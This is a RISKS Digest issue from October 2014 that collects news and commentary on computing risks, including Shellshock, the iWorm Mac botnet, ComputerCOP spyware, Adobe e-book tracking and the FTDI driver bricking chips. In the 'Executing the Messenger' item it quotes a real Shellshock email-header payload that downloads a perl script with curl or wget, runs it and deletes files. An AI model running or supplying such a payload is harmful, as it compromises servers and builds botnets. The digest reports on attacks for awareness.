RISKS Digest 28.32

Friday 31 October 2014

Rocket Heading to International Space Station Explodes; No One Is Hurt

NYT via Monty Solomon <>

Date: Tue, 28 Oct 2014 21:19:24 -0400

The unmanned cargo rocket exploded seconds after liftoff from a NASA site in eastern Virginia.

Dallas hospital alters account of failure to diagnose first US Ebola case

David Tarabar <>

Date: Sat, 25 Oct 2014 19:12:23 -0400

The first three articles in RISKS-28.30 describe a Dallas hospital blaming EHR software for not diagnosing the first US case of Ebola. However on a Friday evening, the hospital told another story. (Bad news released on Friday evening is a popular PR tactic)

But on Friday evening, the hospital effectively retracted that portion of its statement, saying that `there was no flaw' in its electronic health records system. The hospital said “the patient's travel history was documented and available to the full care team in the electronic health record (E.H.R.), including within the physician's workflow.''

An ER patient history is not meaningless paperwork. It may be diagnostically significant and an ER doc is responsible for examining it. All patients are asked about any foreign travel. While EHR software can be improved, human and/or institutional error should be assigned the major blame for this failure to diagnose Ebola.

Cars become uninsurable due to their weak security

Jeremy Epstein <>

Date: Tue, 28 Oct 2014 10:53:19 -0400

According to a BBC report, insurance companies are refusing to insure certain models of cars, or are requiring additional safeguards. The reason? The electronic keys can be hacked, and the number of thefts has been increasing dramatically.

This is probably the most direct consumer connection between (computer) security and insurance that I've seen. Could you imagine "your homeowners insurance bill is going up because you run Windows"?

HP accidentally signed malware, will revoke certificate

Ars <>

Date: Fri, 10 Oct 2014 09:39:26 -0700

Ars Technica via NNSquad

Regardless of the cause, the revocation of the affected certificate will require HP to re-issue a large number of software packages with a new digital signature. While the certificate drop may not affect systems with the software already installed, users will be alerted to a bad certificate if they attempt to re-install software from original media. The full impact of the certificate revocation won't be known until after Verisign revokes the certificate on October 21, Wahlin said.


Clueless FBI sabotages its own anti-encryption campaign

Caroline Craig <>

Date: Fri, 24 Oct 2014 21:49:14 -0700

Caroline Craig, InfoWorld | Oct 24, 2014

FBI Director Comey says smartphone encryption puts law enforcement in peril. Too bad he doesn't seem to understand technology

FBI director says Chinese hackers are like a "drunk burglar"

Ars <>

Date: Tue, 7 Oct 2014 10:31:54 -0400

Report Reveals Wider Tracking of Mail in U.S.

NYT via Monty Solomon <>

Date: Tue, 28 Oct 2014 06:19:25 -0400

The Postal Service approved nearly 50,000 requests last year from law enforcement agencies to secretly track the mail of ordinary Americans for use in criminal and national security investigations.

ComputerCOP: dubious "Internet Safety Software" given to US families

Ars via NNSquad <>

Date: Wed, 1 Oct 2014 08:32:48 -0700

Ars via NNSquad

Police chiefs, sheriffs, and district attorneys have handed out hundreds of thousands of copies of the disc to parents for free at schools, libraries, and community events, usually as a part of an "Internet Safety" outreach initiative. (You can see the long list of ComputerCOP outlets here.) The packaging typically features the agency's official seal and the chief's portrait, with a signed message warning of the "dark and dangerous off-ramps" of the Internet. As official as it looks, ComputerCOP is actually just spyware, generally bought in bulk from a New York company that appears to do nothing but market this software to local government agencies using shady information. The way ComputerCOP works is neither safe nor secure. It isn't particularly effective either, except for generating positive PR for the law enforcement agencies distributing it. As security software goes, we observed a product with a keystroke-capturing function, also called a "keylogger," that could place a family's personal information at extreme risk by transmitting those keystroke logs over the Internet to third-party servers without encryption. That means many versions of ComputerCOP leave children (and their parents, guests, friends, and anyone using the affected computer) exposed to the same predators, identity thieves, and bullies that police claim the software protects against. Furthermore, by providing a free keylogging program--software that operates without even the most basic security safeguards--law enforcement agencies are passing around what amounts to a spying tool that could easily be abused by people who want to snoop on spouses, roommates, or co-workers.

Adobe is Spying on Users, Collecting Data on Their eBook Libraries; Adobe Responds to Reports of Their Spying, Offers Half Truths and Misleading Statements

Nate Hoffelder via Gene Wirchenko <>

Date: Thu, 09 Oct 2014 21:08:48 -0700

Nate Hoffelder, 6 Oct 2014

Nate Hoffelder, 7 Oct 2014

Adobe tracks your e-book reading habits -- sends logs in plain text

Ars <>

Date: Tue, 7 Oct 2014 09:22:03 -0700

Ars Technica via NNSquad

"Adobe's Digital Editions e-book and PDF reader—an application used by thousands of libraries to give patrons access to electronic lending libraries--actively logs and reports every document readers add to their local "library" along with what users do with those files. Even worse, the logs are transmitted over the Internet in the clear, allowing anyone who can monitor network traffic (such as the National Security Agency, Internet service providers and cable companies, or others sharing a public Wi-Fi network) to follow along over readers' shoulders. Ars has independently verified the logging of e-reader activity with the use of a packet capture tool. The exposure of data was first discovered by Nate Hoffelder of The Digital Reader, who reported the issue to Adobe but received no reply. Ars has also reached out to Adobe for comment with no response."

Bugzilla 0-day can reveal 0-day bugs in OSS giants such as Mozilla and Red Hat

Ars <>

Date: Tue, 7 Oct 2014 10:29:27 -0400

White hat claims Yahoo and WinZip hacked by "shellshock" exploiters

Ars <>

Date: Tue, 7 Oct 2014 10:26:11 -0400

Severe Security Problem in Drupal 7.x

Bob Gezelter <>

Date: Fri, 31 Oct 2014 12:33:38 -0700

There has been a critical security flaw identified in Drupal 7.x, an update is available. The flaw allows a SQL injection attack to compromise servers running Drupal. Details of the attack have been published. The relevant bug entry appears to be:

Bob Gezelter,

Chip&Pin^H^H^HDip: Replay It Again Sam

Henry Baker <>

Date: Tue, 28 Oct 2014 13:58:13 -0700

FYI—Didn't Ross Anderson's group at Cambridge demonstrate similar problems with chips&pins a while ago? [YES: See]

Krebs on Security In-depth security news and investigation, 27 Oct 14

Replay Attacks Spoof Chip Card Charges

An odd new pattern of credit card fraud emanating from Brazil and targeting U.S. financial institutions could spell costly trouble for banks that are just beginning to issue customers more secure chip-based credit and debit cards.

Over the past week, at least three U.S. financial institutions reported receiving tens of thousands of dollars in fraudulent credit and debit card transactions coming from Brazil and hitting card accounts stolen in recent retail heists, principally cards compromised as part of the breach at Home Depot.

The most puzzling aspect of these unauthorized charges? They were all submitted through Visa and MasterCard's networks as chip-enabled transactions, even though the banks that issued the cards in question haven't even yet begun sending customers chip-enabled cards.

The most frustrating aspect of these unauthorized charges? They're far harder for the bank to dispute. Banks usually end up eating the cost of fraud from unauthorized transactions when scammers counterfeit and use stolen credit cards. Even so, a bank may be able to recover some of that loss through dispute mechanisms set up by Visa and MasterCard, as long as the bank can show that the fraud was the result of a breach at a specific merchant (in this case Home Depot).

However, banks are responsible for all of the fraud costs that occur from any fraudulent use of their customers' chip-enabled credit/debit cards -- even fraudulent charges disguised as these pseudo-chip transactions. [...]

Apple will face $350M trial over iPod DRM

Ars <>

Date: Fri, 3 Oct 2014 16:44:29 -0400

Apple updates definitions to prevent "iWorm" botnet malware on Macs

Ars <>

Date: Tue, 7 Oct 2014 10:30:53 -0400

APPLE-SA-2014-09-29-1 OS X bash Update 1.0

Monty Solomon <>

Date: Fri, 3 Oct 2014 14:30:31 -0400

OS X bash Update 1.0 is now available and addresses the following:

Bash Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: In certain configurations, a remote attacker may be able to execute arbitrary shell commands Description: An issue existed in Bash's parsing of environment variables. This issue was addressed through improved environment variable parsing by better detecting the end of the function statement. This update also incorporated the suggested CVE-2014-7169 change, which resets the parser state. In addition, this update added a new namespace for exported functions by creating a function decorator to prevent unintended header passthrough to Bash. The names of all environment variables that introduce function definitions are required to have a prefix "__BASH_FUNC<" and suffix ">()" to prevent unintended function passing via HTTP headers.

CVE-2014-6271 : Stephane Chazelas CVE-2014-7169 : Tavis Ormandy

OS X bash Update 1.0 may be obtained from the following webpages: - OS X Lion - OS X Mountain Lion - OS X Mavericks

To check that bash has been updated:

* Open Terminal
* Execute this command: bash --version
* The version after applying this update will be: OS X Mavericks: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13) OS X Mountain Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12) OS X Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Information will also be posted to the Apple Security Updates web site:

This message is signed with Apple's Product Security PGP key, and details are available at:

APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked

Monty Solomon <>

Date: Fri, 3 Oct 2014 14:29:09 -0400

Due to security issues in older versions, Apple has updated the web plug-in blocking mechanism to disable all versions prior to Flash Player and

Information on blocked web plug-ins will be posted to:

This message is signed with Apple's Product Security PGP key, and details are available at:

"One week after patch, Flash vulnerability already exploited in large-scale attacks"

Lucian Constantin <>

Date: Tue, 21 Oct 2014 17:51:20 -0700

Lucian Constantin, Infoworld, 21 Oct 2014 large-scale attacks The Fiesta exploit kit bundles an exploit for the CVE-2014-0569 vulnerability in Flash Player, researchers found

2 Drug Chains Disable Apple Pay, as a Rival Makes Plans

NYT <>

Date: Sun, 26 Oct 2014 23:32:57 -0400

A consortium of merchants plans to introduce a payment system next year that will supplant the use of credit and debit cards.

Apple Pay Runs Afoul of MCX, a Group With a Rival Product

Monty Solomon <>

Date: Wed, 29 Oct 2014 07:08:12 -0400

Rite Aid and CVS are not accepting Apple Pay because they belong to a consortium of retailers planning to release their own mobile payment system next year.

Hackers swipe e-mail addresses from Apple Pay-competitor CurrentC

Ars <>

Date: Wed, 29 Oct 2014 22:46:18 -0400

How Apple Pay and Google Wallet actually work

Ars Technica <>

Date: Wed, 29 Oct 2014 22:47:29 -0400

Reddit-powered botnet infected thousands of Macs worldwide

Sean Gallagher <>

Date: Sun, 5 Oct 2014 00:08:37 -0400

Sean Gallagher, Ars Technica, 3 Oct 2014 Mac.BackDoor.iWorm used Minecraft server subreddit for command and control.

The Russian antivirus vendor Dr. Web has reported the spread of a new botnet that exclusively targets Apple computers running Mac OS X. According to a survey of traffic conducted by researchers at Dr. Web, over 17,000 Macs worldwide are part of the Mac.BackDoor.iWorm botnet-and almost a quarter of them are in the US. One of the most curious aspects of the botnet is that it uses a search of Reddit posts to a Minecraft server list subreddit to retrieve IP addresses for its command and control (CnC) network. That subreddit now appears to have been expunged of CnC data, and the account that posted the data appears to be shut down. ...

Apple patches "Shellshock" Bash bug in OS X 10.9, 10.8, and 10.7

Andrew Cunningham <>

Date: Fri, 3 Oct 2014 00:23:44 -0400

Andrew Cunningham, Ars Technica, 29 Sep 2014 Fixes Bash bug discovered last week that's already been seen in the wild. [See also—PGN]

Shellshock fixes beget another round of patches as attacks mount

Andrew Cunningham <>

Date: Fri, 3 Oct 2014 00:22:24 -0400

Sean Gallagher, Ars Technica, 30 Sep 2014 SANS' Internet Storm Center moves up threat level based on bash exploits in wild.

Over the past few days, Apple, Red Hat, and others have pushed out patches to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities previously allowed attackers to execute commands remotely on systems that use the command parser under some conditions-including Web servers that use certain configurations of Apache. However, some of the patches made changes that broke from the functionality of the GNU bash code, so now debate continues about how to "un-fork" the patches and better secure bash.

At the same time, the urgency of applying those patches has mounted as more attacks that exploit the weaknesses in bash's security (dubbed "Shellshock") have appeared. In addition to the threat first spotted the day after the vulnerability was made public, a number of new attacks have emerged. While some appear to simply be vulnerability scans, there are also new exploit attempts that carry malware or attempt to give the attacker direct remote control of the targeted system. ...

Executing the Messenger

Henry Baker <>

Date: Tue, 28 Oct 2014 14:16:05 -0700

[attachment (Henry says, “but sometimes a picture is worth 1000 words.'') deleted for RISKS. Sorry. PGN]

Here's the To: line: To: {:;, }, /bin/sh.-c.'/bin/sh.-c.'cd/tmp, curl.-sO., lwp-download.http:;, //, wget., fetch., perl.ex.txt, <rm.-fr.ex.*'.&'.&@mailserver.internaldomain>

Cc, From, Subject, References, Message-ID, Comments, Keywords, Resent-From are all similar.

Nothing quite like bashing the postman with shellshock...

Michael Mimoso Follow @mike_mimoso 27 Oct 2014 Shellshock Exploits Targeting SMTP Servers at Webhosts

The persistence of the Shellshock vulnerability remains high more than a month after it first surfaced. The latest attacks involved SMTP servers belonging to web hosts, said a report published by the SANS Internet Storm Center.

Attackers are using Shellshock exploits targeting the now infamous vulnerability in Bash (Bourne Again Shell) in order to drop a perl script onto compromised computers. The script adds the hacked computers to a botnet that receives its commands over IRC, said a post on the Binary Defense Systems website: “The attack leverages Shellshock as a main attack vector through the subject, body, to, from fields. Once compromised, a perl botnet is activated and beaconing on IRC for further instructions.''

Even a built-in keylogger! -- "Microsoft's Windows 10 has permission to spy on you!"

Techworm <>

Date: Tue, 7 Oct 2014 08:21:54 -0700

Techworm via NNSquad

"Microsoft collects information about you, your devices, applications and networks, and your use of those devices, applications and networks. Examples of data we collect include your name, email address, preferences and interests; browsing, search and file history; phone call and SMS data; device configuration and sensor data; and application usage."

"If you open a file, we may collect information about the file, the application used to open the file, and how long it takes any use [of]it for purposes such as improving performance, or [if you]enter text, we may collect typed characters, we may collect typed characters and use them for purposes such as improving autocomplete and spell check features."

Worth reading, even though the entire article is in a low-contrast font and italics.

[See also Chris Merriman, *The Inquirer*, 3 Oct 2014 Its 'privacy' policy includes permission to use a keylogger ]

More on Windows 10 /preview/ data collection

Lauren Weinstein <>

Date: Tue, 7 Oct 2014 09:03:11 -0700

I want to add a few of my own thoughts to that article on the Windows 10 preview version data collection policies.

If any of those data collection features were enabled by default, and unless there's a big red warning at installation that you must respond to with more than a single click, explaining all these aspects, it's still unacceptable. Too many people will download this and use it like any other system without considering the implications. I couldn't care less what they plan to do when it goes out of beta at this juncture—I'm concerned about right now.

As I recall they've done similar in previous previews, but the stakes are much higher now given government attitudes to collected data.

It is a mistake to assume that everyone who will download this preview or end up with it installed (perhaps by their "IT Guy") will be cognizant of the options and implications. I'm the guy who found MS' undisclosed "phone home" behavior years ago. It was not an enormous privacy problem, but it was still telling and a lot of bad press for MS resulted.

"Four more botched Microsoft patches

Woody Leonhard <>

Date: Fri, 17 Oct 2014 14:29:16 -0700

Woody Leonhard, InfoWorld, 16 Oct 2014 Windows users are reporting significant problems with four more October Black Tuesday patches: KB 3000061, KB 2984972, KB 2949927, KB 2995388

"Microsoft yanks botched patch KB 2949927, re-issues KB 2952664"

Woody Leonhard <>

Date: Mon, 20 Oct 2014 11:32:26 -0700

Ah, the risks of missing documentation.

Woody Leonhard, InfoWorld | 17 Oct 2014 Windows 7 upgrade compatibility patch gets a tweaked installer, while the SHA-2 hashing patch is summarily removed without explanation

"Microsoft warns users to kill botched KB 2949927 patch"

Woody Leonhard <>

Date: Mon, 20 Oct 2014 11:45:17 -0700

Woody Leonhard, InfoWorld | 20 Oct 2014 Microsoft yanked SHA-2 patch KB 2949927, and now goes further and cautions users to uninstall the update

"Microsoft misses Windows bug, hackers slip past patch"

Gregg Keizer <>

Date: Thu, 23 Oct 2014 14:09:10 -0700

Gregg Keizer, Computerworld, 22 Oct 2014 Microsoft misses Windows bug, hackers slip past patch Last week's security update 'not robust enough,' say researchers who co-reported flaw

Windows Update intentionally destroys chips

Brian Benchoff via Henry Baker <>

Date: Fri, 24 Oct 2014 09:35:35 -0700

Microsoft Windows Update distributed new driver code that intentionally destroys "counterfeit" chips; the USB "PID" is set to 0 in the EEPROM of the device, rendering the device useless forever more.

This ploy opens up a whole new front in the hacker wars; NSA TAO is no doubt rubbing its hands with delight as we speak.

Just as STUXNET broke down one barrier in hacking; FTDI broke down another. E.g., in the future, look for iPhone and Android apps which disable their competitor apps & implanted medical devices that destroy other implanted medical devices found in the same human body. [...]

Brian Benchoff, FTDI Screws Up, Backs Down, 24 Oct 2014

Re: Windows 9 Reportedly Skipped as Name Would Have Created Code Bugs

Mark Thorson <>

Date: Mon, 27 Oct 2014 21:09:17 -0700

I confidently predict the next version will be Windows 20, which raises the obvious question of what follows Windows 80? I suggest Windows A. That buys another 26 major revisions, which should take us comfortably past the year 199Z (2025 AD).

Taylor Swift Tops Canadian iTunes Chart With 8 Seconds of White Noise

Lorena O'Neil via Henry Baker <>

Date: Fri, 03 Oct 2014 11:06:10 -0700

Andy Patrizio, ITworld, 3 Oct 2014 It's not just your boss or the government that's spying on you, it's also the devices and technologies you embrace.